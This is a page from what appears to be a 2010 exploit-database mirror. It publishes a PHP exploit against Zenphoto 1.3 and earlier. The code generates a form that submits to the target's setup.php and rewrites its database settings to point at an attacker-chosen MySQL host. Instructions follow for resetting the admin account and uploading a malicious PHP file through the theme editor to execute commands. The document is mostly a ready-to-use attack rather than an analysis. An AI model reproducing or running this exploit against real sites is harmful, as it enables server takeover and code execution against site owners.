Home / os / win7

[webapps / 0day] - Zenphoto Config Update and Command Execut

Posted on 26 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Zenphoto Config Update and Command Execute Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 26 Sep 2010 | Exploit category: webapps / 0day | Exploit author: Abysssec | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>======================================================== Zenphoto Config Update and Command Execute Vulnerability ======================================================== Title : Zenphoto Config Update and Command Execute Vulnerability Affected Version : Zenphoto &lt;= 1.3 Discovery : www.abysssec.com Vendor : http://www.zenphoto.org */ $path = &quot;http://www.site.com/zenphoto&quot; .&quot;/&quot; . &quot;zp-core/setup.php&quot;; $new_mysql_user = &quot;abysssec&quot;; $new_mysql_pass = &quot;absssec&quot;; $new_mysql_host = &quot;abysssec.com&quot;; $new_mysql_database = &quot;abysssec_database&quot;; $new_mysql_prefix = &quot;zp_&quot;; echo &quot;&lt;html&gt;&lt;head&gt;&lt;/head&gt; &lt;style&gt; body {font-family:tahoma;font-size:14px} &lt;/style&gt; &lt;body&gt;&quot;; echo &quot;Zen Photo Image Gallery 1.3 Reset admin Password &lt;br&gt; By : Abysssec @ Inc &lt;br&gt;www.Abysssec.com&lt;hr&gt; &lt;form method=&#039;POST&#039; action=&#039;$path&#039; &gt; &lt;input type=hidden name=&#039;mysql&#039; value=&#039;yes&#039;&gt; &lt;input type=hidden name=&#039;mysql_user&#039; value=&#039;$new_mysql_user&#039;&gt; &lt;input type=hidden name=&#039;mysql_pass&#039; value=&#039;$new_mysql_pass&#039;&gt; &lt;input type=hidden name=&#039;mysql_host&#039; value=&#039;$new_mysql_host&#039;&gt; &lt;input type=hidden name=&#039;mysql_database&#039; value=&#039;$new_mysql_database&#039;&gt; &lt;input type=hidden name=&#039;mysql_prefix&#039; value=&#039;$new_mysql_prefix&#039;&gt; After click on below , if target will can connect to your Mysql_Host :&lt;br&gt; You Must view &#039;GO !&#039; Messege ...&lt;br&gt; Click on &amp; wait .... &lt;br&gt; Then , You need to set your admin user and password.&lt;br&gt;&lt;hr&gt; Upload file:&lt;br&gt; you can Edit themes From themes Tab and Upload your malignant PHP file.&lt;br&gt; &lt;input type=submit value=&#039;Send Your Setting &#039;&gt; &lt;/form&gt; &quot;; echo &quot;&lt;/body&gt;&lt;/html&gt;&quot;; ?&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-26]</pre></body></html>

 

TOP